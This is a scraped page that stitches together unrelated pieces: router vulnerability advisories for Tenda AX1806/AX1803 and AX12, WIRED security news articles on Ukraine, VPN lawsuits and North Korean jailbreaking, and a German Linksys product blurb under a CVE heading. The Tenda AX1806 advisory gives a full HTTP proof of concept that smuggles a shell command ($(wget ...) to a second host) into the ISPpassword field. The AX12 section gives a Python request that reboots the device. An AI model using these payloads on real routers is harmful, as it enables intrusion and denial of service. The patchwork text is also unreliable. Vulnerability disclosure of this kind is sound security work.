Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

Plus: Trump backers breach election systems, Microsoft tracks Russia's war prep, a new Facebook leak reveals a mess, and Bored Ape Yacht Club gets hacked.

Surprising news abounded this week as Ukrainian officials weigh next steps in their digital campaigns against Russia, given that their efforts so far have been unexpectedly successful, if sometimes controversial. Overall, Russia is being pummeled with cyberattacks of all sorts at a scale beyond anything the country has dealt with before.

Meanwhile, new research indicates that a small group of North Koreans have taught themselves to jailbreak smartphones in an effort to bypass the regime's extensive digital restrictions and access forbidden media.

Elon Musk's bid this week to purchase Twitter highlighted a host of potential privacy and security concerns for the platform's users. The United States faced a notable spike in child sexual abuse sites in 2021 as CSAM hosting continued to increase dramatically around the world. Hollywood's fight against VPNs has gotten more heated as the entertainment industry expands its accusations about illegal activity enabled by the services. And Cloudflare recorded a historic DDoS attack that bombarded a cryptocurrency platform with 15.3 million requests.

If you feel like doing something for your own security or that of your business this weekend, we've got a roundup of all the most critical mainstream vulnerabilities from April that you can patch right now. 

And there's more. We’ve rounded up all the news that we didn’t break or cover in depth this week. Click on the headlines to read the full stories. And stay safe out there.

The Office of the Director of National Intelligence released its annual transparency report on Friday, which showed that the FBI conducted as many as 3.4 million warrantless searches of Americans’ data in 2021, including 1.9 million searches related to a Russian cyberattack. This is the first time ODNI has published a number for FBI searches utilizing the Foreign Intelligence Surveillance Act of 1978, or FISA. The law is meant to authorize investigative capabilities related to foreign threats, but it allows for some incidental domestic searches in the process. FISA activity has often been criticized for happening without public transparency.

In an in-depth analysis, Reuters looks at eight incidents around the country in which activists supportive of former President Donald Trump have attempted to breach or successfully compromised local voting systems as part of their quest to uncover evidence of manipulation in the 2020 US presidential election. In most cases, activists persuaded local election officials, all Republicans, to export and leak vote data. In the year and a half since Joe Biden became president, Trump loyalists have continued to falsely assert that voting machines across the US were compromised to produce Biden's win.

“These threats are being fueled by extreme elected officials and political insiders who are spreading the Big Lie”—that the 2020 vote was stolen—“to further suppress the vote, destabilize American elections, and undermine voter confidence,” Colorado Secretary of State Jena Griswold told Reuters in a statement.

In a report on Wednesday, Microsoft said it has found evidence that Russia began setting the stage for its invasion of Ukraine as early as March or April 2021. During that time, Russian state-backed hackers began establishing access points in Ukrainian government and critical infrastructure systems, researchers found. The attackers seem to have been collecting intelligence on the Ukrainian military, NATO member states, and diplomatic targets. In the report, Microsoft calls Russian aggression against Ukraine a “hybrid war” and says that Russian cyberattacks have been “relentless and destructive.” 

Microsoft reports that in early 2021, as Russian troops began to gather at the Ukrainian border, the Russian hacking group known as APT 29, Cozy Bear, and Nobelium began mounting phishing attacks to establish access. Microsoft says the Russian hacking group known as Ghostwriter was also active at this time, targeting Ukrainian military email accounts and networks with phishing attacks.

An internal Facebook document prepared last year and obtained by Motherboard lays out concerns from privacy engineers on the social network's Ad and Business Product team about the company's ability to account for the data it holds and track data as it moves through the service. The revelations are not necessarily surprising, given Facebook's sheer scale and recurrent data control issues, but they are significant as the tech giant works to comply with an increasing array of privacy legislations around the world. 

“We do not have an adequate level of control and explainability over how our systems use data, and thus we can’t confidently make controlled policy changes or external commitments such as ‘we will not use X data for Y purpose.’ And yet, this is exactly what regulators expect us to do, increasing our risk of mistakes and misrepresentation,” the document says.

A company spokesperson told Motherboard that the document “does not describe our extensive processes and controls to comply with privacy regulations” and that “this document reflects the technical solutions we are building to scale the current measures we have in place to manage data and meet our obligations.”

Hackers compromised the Instagram account of NFT collection Bored Ape Yacht Club on Monday, posting a link to a copycat site that scammed visitors out of NFTs. The company said in a statement to WIRED that “Rough estimated losses due to the scam are 4 Bored Apes, 6 Mutant Apes, and 3 BAKC, as well as assorted other NFTs estimated at a total value of ~$3m.” NFT scams and other cryptocurrency hustles in which attackers publish a malicious or misleading link to steal coins are unfortunately not new. The BAYC situation is particularly ominous, though, because the company says it had full two-factor authentication enabled on the Instagram account and that “the security practices surrounding the IG account were tight.” The group is investigating how the Instagram takeover occurred.

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

FBI Conducted 3.4 Million Warrantless Searches of Americans' Data

Even the head of the country's online offensive is surprised by the successes—although they’re not without controversy.

When Russian president Vladimir Putin launched his full invasion of Ukraine in February, the world expected Moscow’s cyber and information operations to pummel the country alongside air strikes and shelling. Two months on, however, Kyiv has not only managed to keep the country online amidst a deluge of hacking attempts, but it has brought the fight back to Russia.

Even Ukrainian officials are surprised by how ineffective Russia’s digital war has been.

“I think that the root cause of this is the difference between our systems,” says Mykhailo Fedorov, Ukraine’s 31-year-old minister for digital transformation. “Because the Russian system is centralized. It's monopolized. And it leads to the scale of corruption and graft that is becoming increasingly apparent as the war continues.”

Speaking to WIRED from near Kyiv, Fedorov says his country has been preparing for this moment since Russia first invaded in 2014. “We have had eight years,” he says.

In recent weeks, Fedorov and the Ukrainian government have deployed the controversial face recognition program ClearviewAI to identify killed and captured Russian soldiers. They have deployed thousands of Elon Musk’s Starlink terminals to keep the country connected, even amid Russian bombardment. They have crowdsourced intelligence collection, letting ordinary Ukrainians report troop movements. And, perhaps most critically, they have beaten back aggressive attempts to knock offline their internet, energy, and financial systems.

Fedorov, who also serves as deputy prime minister, ran Ukrainian president Volodmyr Zelensky’s wildly successful election campaign in 2019, winning by nearly 50 points in the second round against incumbent Petro Poroshenko. He did so, in part, by leveraging authentic selfie videos to market the former comedian as an unconventional politician who eschews the normal trappings of politics. It’s exactly that style of video that Zelensky has uploaded regularly from the streets of Kyiv in recent weeks, offering a stark contrast with Putin’s stiff proclamations inside his palatial offices.

Ukraine has brought the war home to Russia in more cutting ways. In March, Reuters reported that Ukraine had purchased face recognition software from American company Clearview AI to identify the bodies of Russian soldiers killed in action—Kyiv later acknowledged that they were using this information to contact the families of the dead soldiers.

“We are pursuing two goals here,” Fedorov says. “First is: We are notifying their relatives, and telling them, basically, that it's not a very good idea to go to war with Ukraine. So that serves as a cautionary tale. And secondly, it's a humanitarian purpose—just telling them where their relatives, or friends, or children are so that they don't try to get this information from the Russian authorities. Because, more often than not, they can't.”

That decision hasn’t come without criticism. Contacting the families of soldiers killed in battle could be seen as harassment. Others have pointed out that being deployed in Ukraine is a PR coup for ClearviewAI, which has been embroiled in scandal over its liberal use by police forces across North America.

Fedorov, for his part, says Russia “can spin this whatever way they want. But the fact of the matter is, there are tens of thousands of Russians dying in Ukraine, and we are just providing this information to their families because that serves, among other things, a humanitarian purpose.”

There is a propaganda element to Kyiv’s use of face recognition technology as well.

“This facial recognition plays to our, let's say, to our advantage in the information space,” Fedorov says. Moscow has projected the image of a professional and volunteer fighting force. “We're trying to say that, for example, Russia is sending conscripts … we are proving that and justifying that with a lot of factual information. We can give you a list of hundreds of people who are 18 and 19 years old, with their names and with their birth dates and how and where specifically, they were conscripted. So that gives some substance to our claims.”

Fedorov says the utility goes beyond just identifying the dead.

“One interesting case study of how we used Clearview AI,” Fedorov says. “There was a man who was found in a Ukrainian hospital, claiming that he was a Ukrainian soldier who suffered from shell shock or some kind of trauma and that he forgot everything. And he was claiming that he was Ukrainian. So the doctor sent the picture to us, and we were able to ID him in a matter of minutes. We found his social network profile, and we established that he was Russian and, of course, he was brought to responsibility.”

Ukrainian officials have said that the frequency of Russian cyberattacks tripled immediately prior to the war, and they have aggressively targeted critical infrastructure since the war began.

But Viktor Zhora, deputy head of Ukraine's State Service of Special Communications and Information Protection, says Moscow may have maxed out its ability to launch attacks. “Russian cyber operations likely reached their full potential," he says.

Zhora told WIRED that years of training, exercises, and cooperation with NATO have made Ukraine far more resilient to cyberattacks. Some attacks are easier to defend against than others—as we spoke, Zhora said he was monitoring an active attack on the state administration of Lviv, which had been publicly announced by Russia hours earlier.

But Zhora stresses that while it is wrong to overestimate how powerful Russia’s cyber capabilities are, it would also be wrong to underestimate its more “sophisticated” operations. “We should continue to observe their potential, like Sandworm, like a Fancy Bear, like Gamaredon, many other groups that are still active, and still very dangerous,” he says, referring to a number of Russian government hacker groups.

Brandon Valeriano, a senior fellow at the Cato Institute who specializes in cyber operations, says offensive cyber operations don’t mesh well with traditional, kinetic warfare. At best, he says, “they’re enabling, they’re complimentary … they don’t transform it.”

Valeriano points to a slowdown in the tempo of Russian-backed cyberattacks targeting the United States as evidence that Moscow’s capacity isn’t as expansive as some have assessed. “They’re not organized for offensive cyber operations in the way that we think they are,” he says.

Kyiv’s ability to beat back against those operations, Valeriano says, can be attributed to “intense collaboration between Ukraine, Western powers, and NATO.” Indeed, Five Eyes signals intelligence agencies have both been providing training and support for Ukraine’s cyber defense and have been sharing threat intelligence. (Zhora stresses that information-sharing is a “two-way road.”)

Ukraine has been able to defend itself, both in cyberspace and in an outright propaganda war, because it has managed to stay online. For that, Fedorov credits a decentralized network of internet service providers and Elon Musk.

“It wouldn't be possible to restore 10 km of cable connection between villages in Chernigiv region after serious battles so quick,” he tweeted earlier this month. “Normally it takes few months.” But with one Starlink satellite, he says, five villages were reconnected in a matter of days.

“We have received over 10,000 Starlink terminals to date, and we use those where we have blind spots with, let's say, more traditional coverage,” Fedorov says. “So we are trying very hard to restore and protect our landline and mobile connections.”

Like any physical infrastructure, those Starlink terminals—which have even managed to keep the embattled city of Mariupol online—have been vulnerable to Russian shelling. Zhora says Russia has managed to hit some of those terminals but has not managed to target the system as a whole. “I suppose that it was coincidence that some shells hit these terminals and locations,” Zhora says. “It's not easy to identify and to attack them systematically.”

Keeping Ukrainians online is a clear strategic objective for Ukraine. Photo and video evidence of the brutality being doled out by the Russian army has galvanized Western support for Kyiv and led to an unprecedented level of support from NATO to help the country defend itself.

It’s also letting regular Ukrainians contribute to the collective defense.

During Zelensky’s presidential campaign, Fedorov made particular use of the messaging app Telegram, which is also popular with Russian intelligence operatives. In recent weeks, the app has been leveraged to collect evidence of possible war crimes in towns like Bucha, but also to enable Ukrainians to upload details of Russian troop movements. A Telegram bot collects photos and videos of Russian military movements, verifying Ukrainians through their digital ID,: a project spearheaded by Fedorov.

“Regular internet users—so, basically, civilians—they can go and post photos of what's happening in Ukraine,” Fedorov says.

The Ukrainian security ministry said in a tweet in March that those crowdsourced reports have directly contributed to drone strikes against Russian tanks.

“There are actually very many ways that regular citizens can contribute to the effort,” Fedorov says. One particularly “successful vector,” he says, is basically trolling. His government has been sending users “into the comment sections of posts by some very high traffic Russian influencers and just trying to talk sense into people and telling them that there's actually a war in Ukraine.”

Fedorov is also responsible for Ukraine’s IT Army, a network of cyber activists and hackers who have targeted Russian systems. In recent weeks, they have dumped huge troves of personal information from large Russian corporations.

Russia’s poor information security has also been a significant factor in their fumbled invasion.

A huge number of technology providers, from cybersecurity firms to cloud hosting services, have pulled out of Russia since the start of the war—either due to sanctions or to a concerted push from Fedorov and others in the Ukrainian government. “If the world were able to stop the delivery of these products to Russia, we see that they will have no infrastructure even to organize attacks,” Zhora says.

Russia’s attempts to knock out mobile and internet connections in Ukraine have mired their own communications. Their encrypted radio platform, Era, has been unreliable, leading Russian soldiers to opt for unencrypted platforms. Numerous outlets have reported details of conversations between Russians troops, their commanders, and their families—some even admitting to possible war crimes over unencrypted channels.

While Fedorov’s reform mission has played a large role in modernizing Ukraine, support from the West has certainly helped. SpaceX and the United States have sent some 5,000 Starlink terminals. Fedorov says the European Union has provided some 10 million euros toward computer systems and workstations.

Asked what Ukraine needs as the war wears into its third month, Fedorov mentions satellite equipment, including more Starlink terminals, as well as laptops, tablets, and other tools “to put our civilian infrastructure back online.” He also jokes: “Let's say that the most surefire way to keep us online for a very long time to come is to provide us with artillery, tanks, and warplanes—because that will effectively end the war. And that will remove the problem altogether.”

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Ukraine’s Digital Battle With Russia Isn’t Going as Expected

Beyond accusations of rampant user copyright infringement, film companies have begun accusing VPNs of enabling a slew of more serious illegal activity.

A group of over two dozen film studios has repeatedly taken popular VPN providers to court, sometimes extracting judgements worth millions of dollars in damages. While piracy remains the central issue, recent legal arguments employed by Hollywood studios have surpassed accusations of copyright infringement and delved into dirtier waters.

Filmmakers attempting to recoup revenue lost to piracy have long alleged that VPN companies both encourage online privacy and have clear-cut evidence that their customers are abusing the privacy and security provided by virtual private networks. But court records show that studios’ legal teams have also accused VPN providers of enabling illegal activity far beyond copyright infringement and, legal experts say, are challenging the notion that VPNs should exist at all.

In March, 26 film companies brought allegations against ExpressVPN and Private Internet Access (PIA), popular “no-log” VPN companies owned by Kape Technologies. The plaintiffs include production companies like Millennium, Voltage, and others behind a slate of popular films. The lawsuit centers on allegations of user privacy. However, court documents reviewed by WIRED reveal plaintiffs arguing that these VPN providers refuse to prevent users from using their services to commit serious illegal acts and run marketing campaigns that openly “boast” that law enforcement is unable to extract any information about their users.

Generally speaking, VPNs give users greater privacy protections by encrypting their online activity and rerouting it through the company’s servers, concealing their IP addresses. Many VPN providers, including ExpressVPN and PIA, claim to maintain “no logs” of their users’ internet activities. This means VPN providers can’t access data to turn over to police or comply with copyright infringement claims. Similar to arguments against comprehensive encryption, the film companies paint VPN providers as culpable in any crimes committed while using their services.

“Emboldened by Defendants’ promises that their identities cannot be disclosed, Defendants’ end users use their VPN services not only to engage in widespread movie piracy, but other outrageous criminal conduct such as harassment, illegal hacking and murder,” reads the lawsuit, filed in US District Court in Colorado. “When these crimes become public, Defendants use these tragic incidents as opportunities to boast about their VPN services.”

The VPN companies responded in court filings that the “inflammatory topics” plaintiffs evoked are irrelevant to copyright infringement. Allegations as far afield as “hacking, stalking, bomb threats, political assassinations, child pornography, and anonymous online message board posts full of hate speech and appearing to encourage violence and murder” are a ploy to portray the VPNs in “a cruelly derogatory light," argue the VPNs’ legal teams.

Beyond vague examples of heinous crimes, the court filing mentions an Express VPN subscriber admitting to downloading child sexual abuse material (CSAM). The film companies also call out the personal political views or activities of those employed by the VPN companies. Specifically, they focus on Rick Falkvinge, who’s known for his political views and arguments that CSAM should be legal. Falkvinge is PIA’s Head of Privacy and creator of the political Pirate Party. He has repeatedly advocated for reforms to copyright laws, calling “copying and sharing” a “natural right.”

PIA’s attorney argues that these allegations must be stricken from the case because they are completely irrelevant and “serve only to inflame emotions in a misguided attempt to prejudice the Court and the public against the defendants by false association with the non-parties whose conduct is described in these paragraphs.”

ExpressVPN and PIA further denied these allegations in statements to WIRED. An ExpressVPN spokesperson also emphasized that the “operation of ExpressVPN’s service has not been changed or otherwise impacted in any way relevant to the parties’ dispute.”

PIA maintained that this litigation jeopardizes user privacy and that it will therefore keep fighting in court. “We assert that the use of VPNs is a legitimate way to protect one’s online privacy—a fundamental human right, which is increasingly in jeopardy of infringement,” the company said.

Legal counsel representing the movie studios did not respond to WIRED’s request for comment.

While Hollywood has waged legal battles around the globe for years, its fights against the VPN industry in the US ramped up last year. VPN company TorGuard, for example, landed in legal hot water with the same group of plaintiffs who successfully forced the VPN provider into blocking BitTorrent traffic for its US users. And in October 2021, VPN.ht also “settled” with these filmmakers, agreeing to not only block BitTorrent but also to log traffic on its US servers. Hollywood studios have also taken providers like Surfshark, VPN Unlimited, and Zenmate to court.

Film company Voltage, which is among the group of companies regularly suing VPN providers, goes a step further, mailing letters to internet customers demanding fines for alleged piracy and threatening them with legal action.

In March 2021, some of the same production companies suing ExpressVPN and PIA also sued no-log VPN provider LiquidVPN for “encouraging and facilitating” piracy. Later, the film companies demanded $10 million in damages from the company. A judge issued a default judgment against LiquidVPN this March, ordering it to pay the studios $14 million.

That lawsuit largely centered around LiquidVPN’s fiery marketing practices and claimed that the VPN is “optimized for torrenting” and lets you “unblock ISP banned streams.” These tactics, the studios argued, encouraged illicit use of the service by those willing to bypass legal restrictions around accessing online content. They might be right.

According to the Electronic Frontier Foundation (EFF), an internet civil liberties group, Hollywood’s demands are “extreme and not supported by law.” But VPNs are also treading into dangerous territory through their marketing tactics.

“The studios argued that a VPN provider _and its hosting company_ should have had a legal responsibility to monitor what their customers were doing with the service, to see if copyright infringement was going on,” says Mitch Stoltz, a senior staff attorney at EFF. “Not only is that not the law, it would undermine the whole purpose of a VPN service, which is to protect people’s internet communications against eavesdropping.” 

Stoltz warns, however, that bold marketing language used by VPNs, such as LiquidVPN’s “optimized for torrenting” claim, can very well be considered “inducement” in a legal context and incur liability for copyright infringement. Fearing the possibility of heavy monetary damages, VPN providers may instead choose to shut down some of their services or settle out of court.

“In contrast, a VPN that doesn’t advertise or encourage infringing uses generally won’t be liable in court even if some users do infringe,” says Stoltz. “That’s an important legal protection for VPN providers, who provide an important service that would be undermined if they were faced with broad monitoring and blocking requirements.”

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

Hollywood’s Fight Against VPNs Turns Ugly

Linksys MR9600 devices before 2.0.5 allow attackers to read arbitrary files via a symbolic link to the root directory of a NAS SMB share.

**Merkmale**

**Die Zukunft beginnt mit der Intelligent Mesh™-Technologie und WiFi 6 jetzt schon.**

Der Linksys MR9600 ist ein extrem leistungsstarker Dual-Band WiFi 6 Router – perfekt für all diejenigen, die sich echte Gigabit-Geschwindigkeiten, eine höhere Reichweite und überall zu Hause genug Power zum Gamen wünschen. Mit Linksys Intelligent Mesh™-Technologie und Datenübertragungsraten von 6 Gbit/s ist er 4x schneller als WiFi 5 Router, verhindert Funklöcher und isoliert Ihr Netzwerk, um Störungen zu vermeiden. Mit diesem zukunftssicheren Router können Sie Ihr Netzwerk bei Bedarf erweitern, indem Sie Produkte hinzufügen, die mit dem Mesh-System von Linksys kompatibel sind. Mit der Linksys App lässt sich der MR9600 mühelos einrichten, sodass Sie in wenigen Minuten 8K-Videos streamen können.

**Mehr Kapazität für mehr Geräte**

WiFi 6 sendet und empfängt mehrere Datenströme gleichzeitig und sorgt für eine 4-mal höhere WLAN-Kapazität, um jedem Mobil-, Streaming-, Gaming- und Smart-Home-Gerät in Ihrem Netzwerk gerecht zu werden.

**Keine Funklöcher mehr**

Intelligent Mesh™-Technologie sorgt in Kombination mit WiFi 6 überall bei Ihnen Zuhause für WLAN-Geschwindigkeiten im Gigabit-Bereich – auch im Garten und auf Smart-Home-Geräten im Außenbereich.

**EINFACHE EINRICHTUNG UND BEDIENUNG**

Über die Linksys App erfolgt das Setup im Nu und Sie können von überall aus einfach auf Ihr Netzwerk zugreifen. Es ist zudem möglich, einzustellen, welche verbundenen Geräte die höchste Bandbreite im WLAN erhalten.

**Verringert WLAN-Überlastung**

Verhindert mithilfe der technisch ausgereiften WiFi 6-Technologie, die Ihr Netzwerk isolieren, Überlastung reduzieren und für das stärkste, klarste WLAN-Signal sorgen kann, Störungen durch benachbarte Netzwerke.

**Smartere Sicherheitsfunktionen**

Ihr Netzwerk ist dank der automatischen Software-Updates, Kinderschutzfunktionen und separatem Gastzugriff immer sicher und auf dem neuesten Stand.

**100 % abwärtskompatibel**

Funktioniert mit allen vorhandenen WLAN-fähigen Geräten wie Tablets, Laptops, Smart-Home- und Streaming-Geräten.

**Linksys App**

**Jederzeit und von überall aus haben Sie Ihr WLAN zu Hause voll im Griff**

Die Linksys App bietet Ihnen über Ihr Smartphone oder Tablet Remote-Zugriff auf Ihr WLAN zu Hause, sodass Sie es immer kontrollieren und verwalten können.

*   **Gastzugriff:** Richten Sie ein separates, passwortgeschütztes WLAN-Netzwerk für bis zu 50 Gäste ein und teilen Sie ihnen das Passwort bequem mit.
*   **Kinderschutzfunktionen:** Sorgen Sie für einen geschützten Internetzugang Ihrer Kinder, auch wenn Sie nicht vor Ort sind. Beschränken Sie den Zugang zu unangemessenen Inhalten oder Websites, die ablenken könnten, kontrollieren Sie die Nutzung und blockieren Sie den Internetzugang bestimmter Geräte.
*   **Gerätepriorisierung:** Geben Sie den Geräten, die die höchste Geschwindigkeit benötigen, den Vorrang.
*   **Geschwindigkeitstest:** Die Geschwindigkeit Ihrer Internetverbindung lässt sich einfach überprüfen und kontrollieren.

**Schnelles und einfaches Setup**

Die Verwaltung Ihres WLANs zu Hause erfolgt mit der Linksys App schnell und einfach:

 

****Laden Sie die Linksys App herunter****

 

 

****Stellen Sie eine Verbindung mit Ihrem Modem her****

 

****Geben Sie Ihrem WLAN einen Namen und erstellen Sie ein Passwort****

CVE-2022-24372: Linksys Dual-Band Mesh-WLAN WiFi 6 Router (MR9600)

A new report suggests that a small but vibrant group of smartphones hackers may be challenging the world's most digitally restrictive regime.

For most of the world, the common practice of "rooting" or "jailbreaking" a phone allows the device's owner to install apps and software tweaks that break the restrictions of Apple’s or Google's operating systems. For a growing number of North Koreans, on the other hand, the same form of hacking allows them to break out of a far more expansive system of control—one that seeks to extend to every aspect of their lives and minds.

On Wednesday, the North Korea-focused human rights organization Lumen and Martyn Williams, a researcher at the Stimson Center think tank's North Korea–focused 38 North project, together released a report on the state of smartphones and telecommunications in the Democratic People's Republic of Korea, a country that restricts its citizens' access to information and the internet more tightly than any other in the world. The report details how millions of government-approved, Android-based smartphones now permeate North Korean society, though with digital restrictions that prevent their users from downloading any app or even any file not officially sanctioned by the state. But within that regime of digital repression, the report also offers a glimpse of an unlikely new group: North Korean jailbreakers capable of hacking those smartphones to secretly regain control of them and unlock a world of forbidden foreign content.

"There has been a sort of constant battle between the North Korean government and its citizens over use of technology: Each time a new technology has been introduced, people have usually found a way to use it for some illicit purpose. But that hasn't really been done through this kind of hacking—until now," says Williams. "In terms of the future of free information in North Korea, it shows that people are still willing to try to break the government's controls."

Learning anything about the details of subversive activity in North Korea—digital or otherwise—is notoriously difficult, given the Hermit Kingdom's nearly airtight information controls. Lumen's findings on North Korean jailbreaking are based on interviews with just two defectors from the country. But Williams says the two escapees both independently described hacking their phones and those of other North Koreans, roughly corroborating each others' telling. Other North Korea–focused researchers who have interviewed defectors say they've heard similar stories.

Both jailbreakers interviewed by Lumen and Williams said they hacked their phones—government-approved, Chinese-made, midrange Android phones known as the Pyongyang 2423 and 2413—primarily so that they could use the devices to watch foreign media and install apps that weren't approved by the government. Their hacking was designed to circumvent a government-created version of Android on those phones, which has for years included a certificate system that requires any file downloaded to the device to be "signed" with a cryptographic signature from government authorities, or else it's immediately and automatically deleted. Both jailbreakers say they were able to remove that certificate authentication scheme from phones, allowing them to install forbidden apps, such as games, as well as foreign media like South Korean films, TV shows, and ebooks that North Koreans have sought to access for decades despite draconian government bans.

In another Orwellian measure, Pyongyang phones' government-created operating system takes screenshots of the device at random intervals, the two defectors say—a surveillance feature designed to instill a sense that the user is always being monitored. The images from those screenshots are then kept in an inaccessible portion of the phone's storage, where they can't be viewed or deleted. Jailbreaking the phones also allowed the two defectors to access and wipe those surveillance screenshots, they say.

The two hackers told Lumen they used their jailbreaking skills to remove restrictions from friends' phones, as well. They said they also knew of people who would jailbreak phones as a commercial service, though often for purposes that had less to do with information freedom than more mundane motives. Some users wanted to install a certain screensaver on their phone, for instance, or wipe the phone's surveillance screenshots merely to free up storage before selling the phone secondhand.

One of the two jailbreakers, by contrast, said he was motivated in part by the same kind of mentality that drives some hackers in the West, according to Sokeel Park, the country director for Liberty in North Korea, who also spoke with the same defector who was interviewed by Lumen. "There isn't necessarily a super rational reason for this kind of hacking," says Park. "It's just like, doing stuff because you _can_, playing this cat-and-mouse game to test your own abilities."

Exactly what technical methods the two hackers used to defy their devices' restrictions is far from clear, given their limited, secondhand accounts. But both described attaching phones to a Windows PC via a USB cable to install a jailbreaking tool. One mentioned that the Pyongyang 2423’s software included a vulnerability that allowed programs to be installed in a hidden directory. The hacker says they exploited that quirk to install a jailbreaking program they'd downloaded while working abroad in China and then smuggled back into North Korea. The other hacker didn't make clear the source of his jailbreaking tool, but said he had been a student in a computer science group at Pyongyang's elite Kim Il Sung University.

The hackers Lumen describes are broadly representative of the two emerging classes of people jailbreaking phones in North Korea, says Nat Kretchun, the vice president for programs at the Open Technology Fund and a longtime researcher of North Korean media and technology. "There are the folks who come out of Kim Il Sung University or Kim Chaek University or part of the North Korean state who are essentially building these tools and doing kind of cheeky things on the side to allow themselves a little bit of room to undo the things that they implemented themselves," says Kretchun, who has independently interviewed several North Korean jailbreakers. "Then there's this other class of folks who have some amount of computer science literacy and are spending so much time with the phones that they're basically mapping out exactly how the thing works in practice and finding pretty clever work-arounds."

Kretchun and other researchers say that the number of jailbreakers remains fairly small, given the rarity of computer literacy in the country and the difficulty of sharing the tools. Changes to North Korean phones to disable their USB connections may have made jailbreaking even more of a challenge, says 38 North's Williams. But he points to a new law implemented in late 2020 that forbids "illegally installing a phone manipulation program" and includes a fine for possessing a smartphone without safeguards designed to block "impure publications," as the law puts it.

"While it is difficult to estimate the number of North Koreans modifying their phones, and interviewees did not seem to think the practice was widespread," reads Lumen's report, "the existence of this specific wording would imply it is happening at a scale where authorities are aware and potentially concerned."

Despite the relatively small scale of jailbreaking in the DPRK, Liberty in North Korea’s Sokeel Park argues that even a small community of phone hackers represents a sign that North Koreans have the will to fight against government controls. He adds that jailbreakers elsewhere in the world should perhaps focus their efforts on building and distributing hacking tools designed to help them.

"I think it's a very obvious call to action for the international community of technologists," Park says. "There is a dynamism there. This kind of hacking shows North Koreans are not passive subjects of oppression and surveillance and censorship. North Korean people are creating solutions and work-arounds so that they can learn things that the North Korean government doesn't want them to learn, sharing things the government considers subversive, and ultimately so they can create a challenge to the regime."

More Great WIRED Stories

*   📩 The latest on tech, science, and more: Get our newsletters!
*   Sober influencers and the end of alcohol
*   For mRNA, Covid vaccines are just the beginning
*   The future of the web is AI-generated marketing copy
*   Keep your home connected with the best wi-fi routers
*   How to limit who can contact you on Instagram
*   👁️ Explore AI like never before with our new database
*   🏃🏽‍♀️ Want the best tools to get healthy? Check out our Gear team’s picks for the best fitness trackers, running gear (including shoes and socks), and best headphones

North Koreans Are Jailbreaking Phones to Access Forbidden Media

Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via the function sub_422168 at /goform/WifiExtraSet.

Affect device: Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Cross Site Request Forgery (CSRF)

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability lies in the /goform/WifiExtraSet page which influences the lastest version of Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

The vulnerability exists in the sub\_422168 function.

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

**POC**

import requests

url \= "http://192.168.158.149/goform/WifiExtraSet"

r \= requests.post(url)
#r = requests.get(url) also can do
print(r.content)

CVE-2022-27375: myCVE/AX12-2.md at main · tianhui999/myCVE

New ad blocker and anti-tracker modules as well as whitelist capabilities provide consumers with secure and private Web browsing.

